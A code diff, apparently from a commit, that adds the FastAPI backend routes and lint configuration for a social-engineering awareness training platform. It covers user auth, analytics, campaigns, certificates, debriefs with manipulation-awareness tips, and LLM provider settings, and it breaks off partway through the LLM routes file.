"E", # pycodestyle errors + "W", # pycodestyle warnings + "F", # pyflakes + "I", # isort + "B", # flake8-bugbear + "UP", # pyupgrade + "S", # flake8-bandit (security) +] +ignore = [ + "S105", # hardcoded-password-string (we handle this via env vars) + "S106", # hardcoded-password-func-arg + "B008", # function-call-in-default-argument (FastAPI Depends pattern) + "B904", # raise-without-from-inside-except (FastAPI HTTPException pattern) + "S110", # try-except-pass (intentional silent fallback in model detection) +] + +[tool.ruff.lint.per-file-ignores] +"scripts/*" = ["S"] # Allow security warnings in utility scripts + +[tool.ruff.format] +quote-style = "double" +indent-style = "space" + +[tool.pytest.ini_options] +testpaths = ["tests"] +asyncio_mode = "auto" diff --git a/backend/requirements.txt b/backend/requirements.txt index 709a536..cc8a36e 100644 --- a/backend/requirements.txt +++ b/backend/requirements.txt @@ -19,3 +19,7 @@ langchain-groq # Utilities PyYAML +httpx + +# Development +ruff diff --git a/backend/routes/__init__.py b/backend/routes/__init__.py new file mode 100644 index 0000000..cf35ace --- /dev/null +++ b/backend/routes/__init__.py @@ -0,0 +1,39 @@ +from routes.adaptive import router as adaptive_router +from routes.analytics import router as analytics_router +from routes.auth import router as auth_router +from routes.campaigns import router as campaigns_router +from routes.certificates import router as certificates_router +from routes.challenges import router as challenges_router +from routes.debrief import router as debrief_router +from routes.imports import router as imports_router +from routes.leaderboard import router as leaderboard_router +from routes.llm import router as llm_router +from routes.notifications import router as notifications_router +from routes.organizations import router as organizations_router +from routes.quizzes import router as quizzes_router +from routes.reports import router as reports_router +from routes.scenario_builder 
import router as scenario_builder_router +from routes.settings import router as settings_router +from routes.simulations import router as simulations_router +from routes.webhooks import router as webhooks_router + +__all__ = [ + "auth_router", + "challenges_router", + "quizzes_router", + "simulations_router", + "llm_router", + "settings_router", + "imports_router", + "reports_router", + "leaderboard_router", + "analytics_router", + "organizations_router", + "campaigns_router", + "notifications_router", + "webhooks_router", + "scenario_builder_router", + "debrief_router", + "certificates_router", + "adaptive_router", +] diff --git a/backend/routes/adaptive.py b/backend/routes/adaptive.py new file mode 100644 index 0000000..f0b47c3 --- /dev/null +++ b/backend/routes/adaptive.py @@ -0,0 +1,28 @@ +from fastapi import APIRouter, Depends + +from models.schemas import User +from services.adaptive import ( + get_adaptive_persona_params, + get_recommended_categories, + get_recommended_difficulty, +) +from services.auth import get_current_user + +router = APIRouter(prefix="/adaptive", tags=["adaptive"]) + + +@router.get("/difficulty") +async def get_difficulty_recommendation(current_user: User = Depends(get_current_user)): + """Get recommended difficulty for current user.""" + difficulty = await get_recommended_difficulty(current_user.id) + categories = await get_recommended_categories(current_user.id) + return { + "recommended_difficulty": difficulty, + "weak_categories": categories, + } + + +@router.get("/persona-params") +async def get_persona_params(current_user: User = Depends(get_current_user)): + """Get adaptive AI persona parameters based on user skill level.""" + return await get_adaptive_persona_params(current_user.id) diff --git a/backend/routes/analytics.py b/backend/routes/analytics.py new file mode 100644 index 0000000..4cfa312 --- /dev/null +++ b/backend/routes/analytics.py @@ -0,0 +1,167 @@ +from fastapi import APIRouter, Depends + +from models.schemas import 
User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/analytics", tags=["analytics"]) + + +@router.get("/personal") +async def get_personal_analytics(current_user: User = Depends(get_current_user)): + """Get personal analytics for the current user.""" + sims = await db.simulations.find( + {"user_id": current_user.id, "status": "completed"}, {"_id": 0} + ).to_list(1000) + + if not sims: + return { + "total_simulations": 0, + "avg_score": 0, + "category_breakdown": {}, + "difficulty_breakdown": {}, + "score_over_time": [], + "cialdini_radar": {}, + "type_distribution": {}, + "improvement_rate": 0, + } + + # Average score + scores = [s.get("score", 0) for s in sims if s.get("score") is not None] + avg_score = sum(scores) / len(scores) if scores else 0 + + # Category breakdown (Cialdini) + cialdini_scores = {} + cialdini_counts = {} + for sim in sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 0) or 0 + for cat in categories: + cialdini_scores.setdefault(cat, []).append(score) + cialdini_counts[cat] = cialdini_counts.get(cat, 0) + 1 + + cialdini_radar = {} + for cat, cat_scores in cialdini_scores.items(): + cialdini_radar[cat] = round(sum(cat_scores) / len(cat_scores), 1) if cat_scores else 0 + + # Difficulty breakdown + difficulty_counts = {} + difficulty_scores = {} + for sim in sims: + diff = sim.get("difficulty", "medium") + difficulty_counts[diff] = difficulty_counts.get(diff, 0) + 1 + score = sim.get("score", 0) or 0 + difficulty_scores.setdefault(diff, []).append(score) + + difficulty_breakdown = {} + for diff, d_scores in difficulty_scores.items(): + difficulty_breakdown[diff] = { + "count": difficulty_counts.get(diff, 0), + "avg_score": round(sum(d_scores) / len(d_scores), 1) if d_scores else 0, + } + + # Score over time + score_over_time = [] + for sim in sorted(sims, key=lambda s: s.get("started_at", "")): + score_over_time.append( + { + 
"date": sim.get("completed_at", sim.get("started_at", "")), + "score": sim.get("score", 0) or 0, + "type": sim.get("simulation_type", "unknown"), + "title": sim.get("title", "Untitled"), + } + ) + + # Type distribution + type_dist = {} + for sim in sims: + sim_type = sim.get("simulation_type", "unknown") + type_dist[sim_type] = type_dist.get(sim_type, 0) + 1 + + # Improvement rate (compare first half vs second half) + improvement_rate = 0 + if len(scores) >= 4: + mid = len(scores) // 2 + first_half_avg = sum(scores[:mid]) / mid + second_half_avg = sum(scores[mid:]) / (len(scores) - mid) + improvement_rate = round(second_half_avg - first_half_avg, 1) + + return { + "total_simulations": len(sims), + "avg_score": round(avg_score, 1), + "category_breakdown": cialdini_counts, + "difficulty_breakdown": difficulty_breakdown, + "score_over_time": score_over_time, + "cialdini_radar": cialdini_radar, + "type_distribution": type_dist, + "improvement_rate": improvement_rate, + } + + +@router.get("/team") +async def get_team_analytics(current_user: User = Depends(get_current_user)): + """Get team/organization analytics.""" + if not current_user.organization_id: + return {"error": "Not part of an organization"} + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if not org: + return {"error": "Organization not found"} + + member_ids = org.get("member_ids", []) + members = await db.users.find( + {"id": {"$in": member_ids}}, + {"_id": 0, "password_hash": 0}, + ).to_list(100) + + # Aggregate team stats + team_stats = [] + total_sims = 0 + total_score = 0 + total_scored_sims = 0 + weakest_categories = {} + + for member in members: + user_sims = await db.simulations.find( + {"user_id": member["id"], "status": "completed"}, {"_id": 0} + ).to_list(1000) + + user_scores = [s.get("score", 0) for s in user_sims if s.get("score") is not None] + user_avg = sum(user_scores) / len(user_scores) if user_scores else 0 + total_sims += len(user_sims) + 
total_score += sum(user_scores) + total_scored_sims += len(user_scores) + + # Track per-category scores + for sim in user_sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 0) or 0 + for cat in categories: + weakest_categories.setdefault(cat, []).append(score) + + team_stats.append( + { + "user_id": member["id"], + "username": member.get("username", ""), + "display_name": member.get("display_name", ""), + "simulations_completed": len(user_sims), + "avg_score": round(user_avg, 1), + "level": member.get("level", 1), + } + ) + + # Find weakest areas + category_averages = {} + for cat, cat_scores in weakest_categories.items(): + category_averages[cat] = round(sum(cat_scores) / len(cat_scores), 1) + + team_avg = round(total_score / total_scored_sims, 1) if total_scored_sims > 0 else 0 + + return { + "organization": {"id": org["id"], "name": org["name"]}, + "total_members": len(members), + "total_simulations": total_sims, + "team_avg_score": team_avg, + "category_averages": category_averages, + "member_stats": sorted(team_stats, key=lambda x: x["avg_score"], reverse=True), + } diff --git a/backend/routes/auth.py b/backend/routes/auth.py new file mode 100644 index 0000000..e41ca5c --- /dev/null +++ b/backend/routes/auth.py @@ -0,0 +1,163 @@ +import re + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import ( + LoginRequest, + LoginResponse, + PasswordChangeRequest, + ProfileUpdateRequest, + RegisterRequest, + User, +) +from services.auth import create_token, get_current_user, hash_password, verify_password +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/auth", tags=["auth"]) + +PASSWORD_MIN_LENGTH = 8 + + +def validate_password(password: str) -> str: + """Validate password complexity. 
Returns error message or empty string.""" + if len(password) < PASSWORD_MIN_LENGTH: + return f"Password must be at least {PASSWORD_MIN_LENGTH} characters" + if not re.search(r"[A-Z]", password): + return "Password must contain at least one uppercase letter" + if not re.search(r"[0-9]", password): + return "Password must contain at least one number" + return "" + + +@router.post("/register", response_model=LoginResponse) +async def register(request: RegisterRequest): + """Register a new user account.""" + # Check if username already exists + existing = await db.users.find_one({"username": request.username}) + if existing: + raise HTTPException(status_code=409, detail="Username already taken") + + # Validate password + pw_error = validate_password(request.password) + if pw_error: + raise HTTPException(status_code=400, detail=pw_error) + + # Check invite code if provided (for org joining) + organization_id = None + if request.invite_code: + org = await db.organizations.find_one({"invite_code": request.invite_code}) + if not org: + raise HTTPException(status_code=400, detail="Invalid invite code") + organization_id = org["id"] + + # Create user + user = User( + username=request.username, + password_hash=hash_password(request.password), + email=request.email, + display_name=request.display_name or request.username, + organization_id=organization_id, + ) + doc = user.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.users.insert_one(doc) + + # Add to organization if invite code + if organization_id: + await db.organizations.update_one( + {"id": organization_id}, + {"$addToSet": {"member_ids": user.id}}, + ) + + token = create_token(user.id) + return LoginResponse( + token=token, + user={ + "id": user.id, + "username": user.username, + "display_name": user.display_name, + "role": user.role, + "created_at": user.created_at.isoformat(), + }, + ) + + +@router.post("/login", response_model=LoginResponse) +async def login(request: LoginRequest): + 
user_doc = await db.users.find_one({"username": request.username}, {"_id": 0}) + + if not user_doc or not verify_password(request.password, user_doc["password_hash"]): + raise HTTPException(status_code=401, detail="Invalid credentials") + + user = User(**user_doc) + token = create_token(user.id) + + # Update last_active and check streak + await award_xp(user.id, 0, check_streak=True) + + return LoginResponse( + token=token, + user={ + "id": user.id, + "username": user.username, + "display_name": user.display_name, + "role": user.role, + "organization_id": user.organization_id, + "xp": user.xp, + "level": user.level, + "badges": user.badges, + "streak_days": user.streak_days, + "theme": user.theme, + "created_at": user.created_at.isoformat(), + }, + ) + + +@router.get("/me") +async def get_me(current_user: User = Depends(get_current_user)): + return { + "id": current_user.id, + "username": current_user.username, + "display_name": current_user.display_name, + "email": current_user.email, + "role": current_user.role, + "organization_id": current_user.organization_id, + "xp": current_user.xp, + "level": current_user.level, + "badges": current_user.badges, + "streak_days": current_user.streak_days, + "theme": current_user.theme, + "notifications_enabled": current_user.notifications_enabled, + "created_at": current_user.created_at.isoformat(), + } + + +@router.put("/profile") +async def update_profile( + updates: ProfileUpdateRequest, current_user: User = Depends(get_current_user) +): + """Update user profile.""" + update_data = {k: v for k, v in updates.model_dump().items() if v is not None} + if not update_data: + raise HTTPException(status_code=400, detail="No fields to update") + + await db.users.update_one({"id": current_user.id}, {"$set": update_data}) + return {"message": "Profile updated"} + + +@router.post("/change-password") +async def change_password( + request: PasswordChangeRequest, current_user: User = Depends(get_current_user) +): + """Change user 
password.""" + if not verify_password(request.current_password, current_user.password_hash): + raise HTTPException(status_code=400, detail="Current password is incorrect") + + pw_error = validate_password(request.new_password) + if pw_error: + raise HTTPException(status_code=400, detail=pw_error) + + new_hash = hash_password(request.new_password) + await db.users.update_one({"id": current_user.id}, {"$set": {"password_hash": new_hash}}) + return {"message": "Password changed successfully"} diff --git a/backend/routes/campaigns.py b/backend/routes/campaigns.py new file mode 100644 index 0000000..a1010bb --- /dev/null +++ b/backend/routes/campaigns.py @@ -0,0 +1,146 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Campaign, CampaignProgress, User +from services.auth import get_current_user +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/campaigns", tags=["campaigns"]) + + +@router.get("") +async def get_campaigns(current_user: User = Depends(get_current_user)): + """List all published campaigns.""" + campaigns = await db.campaigns.find({"is_published": True}, {"_id": 0}).to_list(100) + return campaigns + + +@router.get("/{campaign_id}") +async def get_campaign(campaign_id: str, current_user: User = Depends(get_current_user)): + """Get campaign details with user progress.""" + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + progress = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id}, {"_id": 0} + ) + + return {"campaign": campaign, "progress": progress} + + +@router.post("") +async def create_campaign(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new campaign (admin/instructor only).""" + if current_user.role 
not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + campaign = Campaign( + title=data["title"], + description=data.get("description", ""), + difficulty=data.get("difficulty", "medium"), + stages=data.get("stages", []), + cialdini_categories=data.get("cialdini_categories", []), + estimated_time=data.get("estimated_time", 30), + created_by=current_user.id, + is_published=data.get("is_published", False), + ) + doc = campaign.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.campaigns.insert_one(doc) + return {"id": campaign.id, "message": "Campaign created"} + + +@router.post("/{campaign_id}/start") +async def start_campaign(campaign_id: str, current_user: User = Depends(get_current_user)): + """Start a campaign.""" + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + # Check if already in progress + existing = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id, "status": "in_progress"} + ) + if existing: + return {"progress_id": existing["id"], "message": "Campaign already in progress"} + + progress = CampaignProgress( + campaign_id=campaign_id, + user_id=current_user.id, + ) + doc = progress.model_dump() + doc["started_at"] = doc["started_at"].isoformat() + await db.campaign_progress.insert_one(doc) + + return {"progress_id": progress.id, "message": "Campaign started", "first_stage": 0} + + +@router.post("/{campaign_id}/stage/{stage_index}/complete") +async def complete_stage( + campaign_id: str, + stage_index: int, + result: dict[str, Any], + current_user: User = Depends(get_current_user), +): + """Complete a campaign stage.""" + progress = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id, "status": "in_progress"}, + {"_id": 0}, + ) + if not progress: + raise 
HTTPException(status_code=404, detail="No active campaign progress") + + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + # Add stage result + stage_result = { + "stage_index": stage_index, + "score": result.get("score", 0), + "completed_at": datetime.now(UTC).isoformat(), + "events": result.get("events", []), + } + + stage_results = progress.get("stage_results", []) + stage_results.append(stage_result) + + # Check if campaign is complete + total_stages = len(campaign.get("stages", [])) + next_stage = stage_index + 1 + is_complete = next_stage >= total_stages + + updates = { + "stage_results": stage_results, + "current_stage": next_stage, + } + + if is_complete: + updates["status"] = "completed" + updates["completed_at"] = datetime.now(UTC).isoformat() + # Calculate overall score + all_scores = [r.get("score", 0) for r in stage_results] + updates["overall_score"] = round(sum(all_scores) / len(all_scores), 1) if all_scores else 0 + + # Award XP for campaign completion + xp_earned = 100 + (updates["overall_score"] // 10) * 10 + await award_xp(current_user.id, int(xp_earned)) + else: + # Award XP per stage + await award_xp(current_user.id, 25) + + await db.campaign_progress.update_one( + {"id": progress["id"]}, + {"$set": updates}, + ) + + return { + "message": "Stage completed" if not is_complete else "Campaign completed!", + "next_stage": next_stage if not is_complete else None, + "is_complete": is_complete, + "overall_score": updates.get("overall_score"), + } diff --git a/backend/routes/certificates.py b/backend/routes/certificates.py new file mode 100644 index 0000000..41806c0 --- /dev/null +++ b/backend/routes/certificates.py @@ -0,0 +1,97 @@ +from datetime import UTC, datetime + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db + 
+router = APIRouter(prefix="/certificates", tags=["certificates"]) + + +@router.get("/{simulation_id}") +async def get_certificate_data(simulation_id: str, current_user: User = Depends(get_current_user)): + """Generate certificate data for a completed simulation.""" + sim = await db.simulations.find_one({"id": simulation_id, "status": "completed"}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Completed simulation not found") + + score = sim.get("score", 0) or 0 + if score < 70: + raise HTTPException(status_code=400, detail="Certificate requires a minimum score of 70%") + + # Determine certification level + if score >= 95: + cert_level = "Platinum" + elif score >= 85: + cert_level = "Gold" + elif score >= 70: + cert_level = "Silver" + else: + cert_level = "Bronze" + + certificate = { + "certificate_id": f"CERT-{simulation_id[:8].upper()}", + "recipient": { + "name": current_user.display_name or current_user.username, + "username": current_user.username, + }, + "simulation": { + "title": sim.get("title", "Social Engineering Awareness"), + "type": sim.get("simulation_type", "simulation"), + "difficulty": sim.get("difficulty", "medium"), + "score": score, + }, + "certification": { + "level": cert_level, + "title": "Social Engineering Awareness", + "description": ( + f"Has demonstrated {cert_level.lower()}-level " + f"proficiency in identifying and defending " + f"against social engineering attacks." 
+ ), + }, + "issued_at": datetime.now(UTC).isoformat(), + "issuer": "Pretexta - Social Engineering Simulation Lab", + "verification_url": f"/verify/{simulation_id[:8].upper()}", + } + + return certificate + + +@router.get("/user/all") +async def get_user_certificates(current_user: User = Depends(get_current_user)): + """Get all certificates for the current user.""" + sims = await db.simulations.find( + { + "user_id": current_user.id, + "status": "completed", + "score": {"$gte": 70}, + }, + {"_id": 0}, + ).to_list(100) + + certificates = [] + for sim in sims: + score = sim.get("score", 0) or 0 + if score >= 95: + level = "Platinum" + elif score >= 85: + level = "Gold" + elif score >= 70: + level = "Silver" + else: + continue + + certificates.append( + { + "certificate_id": f"CERT-{sim['id'][:8].upper()}", + "simulation_id": sim["id"], + "title": sim.get("title", "Social Engineering Awareness"), + "score": score, + "level": level, + "completed_at": sim.get("completed_at", sim.get("started_at")), + } + ) + + return certificates diff --git a/backend/routes/challenges.py b/backend/routes/challenges.py new file mode 100644 index 0000000..2c9cfa2 --- /dev/null +++ b/backend/routes/challenges.py @@ -0,0 +1,29 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/challenges", tags=["challenges"]) + + +@router.get("", response_model=list[Challenge]) +async def get_challenges(current_user: User = Depends(get_current_user)): + challenges = await db.challenges.find({}, {"_id": 0}).to_list(1000) + return challenges + + +@router.get("/{challenge_id}", response_model=Challenge) +async def get_challenge(challenge_id: str, current_user: User = Depends(get_current_user)): + challenge = await db.challenges.find_one({"id": challenge_id}, {"_id": 0}) + if not challenge: + raise HTTPException(status_code=404, detail="Challenge not 
found") + return challenge + + +@router.post("", response_model=Challenge) +async def create_challenge(challenge: Challenge, current_user: User = Depends(get_current_user)): + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + return challenge diff --git a/backend/routes/debrief.py b/backend/routes/debrief.py new file mode 100644 index 0000000..9450fc1 --- /dev/null +++ b/backend/routes/debrief.py @@ -0,0 +1,196 @@ +import logging +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db +from services.llm import get_llm_generate_model + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/debrief", tags=["debrief"]) + +CIALDINI_DESCRIPTIONS = { + "reciprocity": ( + "The attacker gave you something (a favor, information) to create a sense of obligation." + ), + "scarcity": ( + "Urgency or limited availability was used to pressure you into acting without thinking." + ), + "authority": ( + "The attacker impersonated someone in a position of power to override your judgment." 
+ ), + "commitment": ("Small initial compliance was used to build toward larger, riskier requests."), + "liking": ("The attacker built rapport or familiarity to lower your defenses."), + "social_proof": ("References to what 'others are doing' were used to normalize the request."), +} + + +@router.get("/{simulation_id}") +async def get_debrief(simulation_id: str, current_user: User = Depends(get_current_user)): + """Get or generate post-simulation debrief analysis.""" + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + # Return cached debrief if exists + if sim.get("debrief"): + return sim["debrief"] + + # Generate debrief + debrief = await _generate_debrief(sim) + + # Cache it + await db.simulations.update_one( + {"id": simulation_id}, + {"$set": {"debrief": debrief}}, + ) + + return debrief + + +async def _generate_debrief(sim: dict[str, Any]) -> dict[str, Any]: + """Generate a detailed debrief analysis.""" + events = sim.get("events", []) + score = sim.get("score", 0) or 0 + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + + # Key moments analysis + key_moments = [] + for i, event in enumerate(events): + if event.get("action") in ("complied", "clicked", "shared_info", "refused", "reported"): + key_moments.append( + { + "index": i, + "action": event.get("action"), + "was_correct": event.get("action") in ("refused", "reported"), + "description": event.get("description", ""), + "tip": _get_tip_for_action(event.get("action", "")), + } + ) + + # Cialdini analysis + cialdini_analysis = [] + for cat in categories: + cialdini_analysis.append( + { + "principle": cat, + "description": CIALDINI_DESCRIPTIONS.get(cat, ""), + "was_used": True, + } + ) + + # Performance rating + if score >= 90: + rating = "excellent" + summary = ( + "You demonstrated strong awareness and successfully identified the attack vectors." 
+ ) + elif score >= 70: + rating = "good" + summary = "Good performance. You caught most red flags but had some vulnerable moments." + elif score >= 50: + rating = "fair" + summary = ( + "Mixed results. You fell for some manipulation " + "techniques. Review the key moments below." + ) + else: + rating = "needs_improvement" + summary = ( + "The attacker was able to exploit psychological " + "vulnerabilities. Focus on the tips below." + ) + + # Recommendations + recommendations = [] + if score < 70: + recommendations.append( + "Always verify identity through a separate, " + "trusted channel before complying with requests." + ) + if "authority" in categories: + recommendations.append( + "Question authority-based requests. Legitimate " + "leaders rarely bypass established procedures." + ) + if "scarcity" in categories: + recommendations.append( + "Be suspicious of artificial urgency. Take time to verify before acting." + ) + if "reciprocity" in categories: + recommendations.append( + "Unsolicited favors may be manipulation. Don't feel obligated to reciprocate." + ) + if score >= 80: + recommendations.append("Great defense! Try harder difficulty scenarios to keep improving.") + + return { + "simulation_id": sim.get("id"), + "title": sim.get("title", "Untitled"), + "score": score, + "rating": rating, + "summary": summary, + "cialdini_analysis": cialdini_analysis, + "key_moments": key_moments, + "recommendations": recommendations, + "total_events": len(events), + "correct_actions": sum(1 for m in key_moments if m.get("was_correct")), + "incorrect_actions": sum(1 for m in key_moments if not m.get("was_correct")), + } + + +def _get_tip_for_action(action: str) -> str: + tips = { + "complied": ( + "You complied with a suspicious request. Always verify through official channels." + ), + "clicked": ( + "You clicked a potentially malicious link. Hover over links to check URLs first." + ), + "shared_info": ( + "You shared sensitive information. 
Never share credentials over unverified channels." + ), + "refused": ("Good call! Refusing suspicious requests is the right approach."), + "reported": ( + "Excellent! Reporting suspicious activity helps protect the entire organization." + ), + } + return tips.get(action, "") + + +@router.post("/{simulation_id}/ai-analysis") +async def get_ai_debrief(simulation_id: str, current_user: User = Depends(get_current_user)): + """Generate AI-powered deep analysis of a simulation (requires LLM config).""" + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + if not config: + raise HTTPException(status_code=400, detail="LLM not configured") + + prompt = f"""Analyze this social engineering simulation result and provide educational feedback. + +Simulation: {sim.get("title", "Unknown")} +Score: {sim.get("score", 0)} +Type: {sim.get("simulation_type", "unknown")} +Events: {sim.get("events", [])} + +Provide: +1. What manipulation techniques were used +2. Where the user was most vulnerable +3. Specific, actionable tips for improvement +4. A psychological explanation of why these techniques work + +Keep it educational. 
Format as JSON with keys: +techniques, vulnerabilities, tips, psychology.""" + + try: + response = await get_llm_generate_model(config, prompt, {}) + return {"ai_analysis": response.content, "simulation_id": simulation_id} + except Exception as e: + logger.error(f"AI debrief failed: {e}") + raise HTTPException(status_code=500, detail="AI analysis failed") diff --git a/backend/routes/imports.py b/backend/routes/imports.py new file mode 100644 index 0000000..8392ca3 --- /dev/null +++ b/backend/routes/imports.py @@ -0,0 +1,41 @@ +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, Quiz, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/import", tags=["import"]) + + +@router.post("/yaml") +async def import_yaml_file( + file_content: dict[str, Any], current_user: User = Depends(get_current_user) +): + """Import YAML challenge or quiz.""" + try: + yaml_type = file_content.get("type") + data = file_content.get("data") + + if yaml_type == "challenge": + challenge = Challenge(**data) + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + return {"message": "Challenge imported", "id": challenge.id} + + elif yaml_type == "quiz": + quiz = Quiz(**data) + doc = quiz.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.quizzes.insert_one(doc) + return {"message": "Quiz imported", "id": quiz.id} + + else: + raise HTTPException(status_code=400, detail="Unknown YAML type") + + except HTTPException: + raise + except Exception as e: + raise HTTPException(status_code=400, detail=f"Import failed: {str(e)}") diff --git a/backend/routes/leaderboard.py b/backend/routes/leaderboard.py new file mode 100644 index 0000000..42ccb61 --- /dev/null +++ b/backend/routes/leaderboard.py @@ -0,0 +1,89 @@ +from fastapi import APIRouter, Depends, Query + +from models.schemas import 
User +from services.auth import get_current_user +from services.database import db +from services.gamification import BADGE_DEFINITIONS, xp_for_next_level + +router = APIRouter(prefix="/leaderboard", tags=["leaderboard"]) + + +@router.get("") +async def get_leaderboard( + scope: str = Query("global", regex="^(global|organization)$"), + limit: int = Query(50, le=100), + current_user: User = Depends(get_current_user), +): + """Get leaderboard rankings.""" + query = {} + if scope == "organization" and current_user.organization_id: + query["organization_id"] = current_user.organization_id + + users = ( + await db.users.find( + query, + {"_id": 0, "password_hash": 0}, + ) + .sort("xp", -1) + .to_list(limit) + ) + + leaderboard = [] + for rank, user in enumerate(users, 1): + # Count completed simulations + sim_count = await db.simulations.count_documents( + {"user_id": user["id"], "status": "completed"} + ) + + leaderboard.append( + { + "rank": rank, + "user_id": user["id"], + "username": user.get("username", ""), + "display_name": user.get("display_name", user.get("username", "")), + "xp": user.get("xp", 0), + "level": user.get("level", 1), + "badges_count": len(user.get("badges", [])), + "streak_days": user.get("streak_days", 0), + "simulations_completed": sim_count, + "is_current_user": user["id"] == current_user.id, + } + ) + + return leaderboard + + +@router.get("/me") +async def get_my_rank(current_user: User = Depends(get_current_user)): + """Get current user's rank and XP progress.""" + # Count users with more XP + higher_xp_count = await db.users.count_documents({"xp": {"$gt": current_user.xp}}) + rank = higher_xp_count + 1 + total_users = await db.users.count_documents({}) + + sim_count = await db.simulations.count_documents( + {"user_id": current_user.id, "status": "completed"} + ) + + return { + "rank": rank, + "total_users": total_users, + "xp_progress": xp_for_next_level(current_user.xp), + "badges": current_user.badges, + "streak_days": 
current_user.streak_days, + "simulations_completed": sim_count, + } + + +@router.get("/badges") +async def get_all_badges(current_user: User = Depends(get_current_user)): + """Get all available badges with earned status.""" + result = [] + for badge in BADGE_DEFINITIONS: + result.append( + { + **badge, + "earned": badge["id"] in current_user.badges, + } + ) + return result diff --git a/backend/routes/llm.py b/backend/routes/llm.py new file mode 100644 index 0000000..03d7bd2 --- /dev/null +++ b/backend/routes/llm.py @@ -0,0 +1,307 @@ +import logging +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException, Query +from langchain_core.messages import AIMessage, HumanMessage, SystemMessage + +from models.schemas import LLMConfig, User +from services.auth import get_current_user +from services.database import db +from services.llm import ( + LOCAL_DEFAULTS, + PROVIDER_MODELS, + fetch_local_models, + fetch_openrouter_models, + get_llm_chat_model, + get_llm_generate_model, + get_provider_models, + repair_json, +) + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/llm", tags=["llm"]) + +# ==================== PROVIDER & MODEL INFO ==================== + +PROVIDER_INFO = { + "groq": { + "name": "Groq", + "description": "Ultra-fast inference. Free tier available. Best for quick responses.", + "auth": "api_key", + "signup_url": "https://console.groq.com", + "placeholder": "gsk_...", + }, + "gemini": { + "name": "Google Gemini", + "description": "Google's multimodal AI. Free tier with generous limits.", + "auth": "api_key", + "signup_url": "https://aistudio.google.com/apikey", + "placeholder": "AIza...", + }, + "claude": { + "name": "Anthropic Claude", + "description": "Advanced reasoning and safety. Paid API.", + "auth": "api_key", + "signup_url": "https://console.anthropic.com", + "placeholder": "sk-ant-...", + }, + "openai": { + "name": "OpenAI", + "description": "GPT-4o and GPT-3.5. 
Industry standard. Paid API.", + "auth": "api_key", + "signup_url": "https://platform.openai.com/api-keys", + "placeholder": "sk-...", + }, + "openrouter": { + "name": "OpenRouter", + "description": "Access 200+ models from one API key. Free models available. Best value.", + "auth": "api_key", + "signup_url": "https://openrouter.ai/keys", + "placeholder": "sk-or-v1-...", + "recommended": True, + }, + "local": { + "name": "Local LLM", + "description": ( + "Connect to Ollama, LM Studio, llama.cpp, or any " + "OpenAI-compatible local server. No API key needed." + ), + "auth": "base_url", + "placeholder": "http://localhost:11434/v1", + "presets": LOCAL_DEFAULTS, + }, +} + + +@router.get("/providers") +async def get_providers(current_user: User = Depends(get_current_user)): + """List all supported LLM providers with info.""" + return PROVIDER_INFO + + +@router.get("/models/{provider}") +async def get_models_for_provider( + provider: str, + current_user: User = Depends(get_current_user), +): + """Get available models for a provider.""" + if provider == "local": + # Try to fetch from configured local endpoint + config = await db.llm_configs.find_one({"provider": "local"}, {"_id": 0}) + default_url = LOCAL_DEFAULTS["ollama"] + base_url = config.get("base_url", default_url) if config else default_url + models = await fetch_local_models(base_url) + if models: + return {"provider": provider, "models": models, "source": "live"} + # Fallback: return empty with instruction + return { + "provider": provider, + "models": [], + "source": "none", + "message": "No local server detected. 
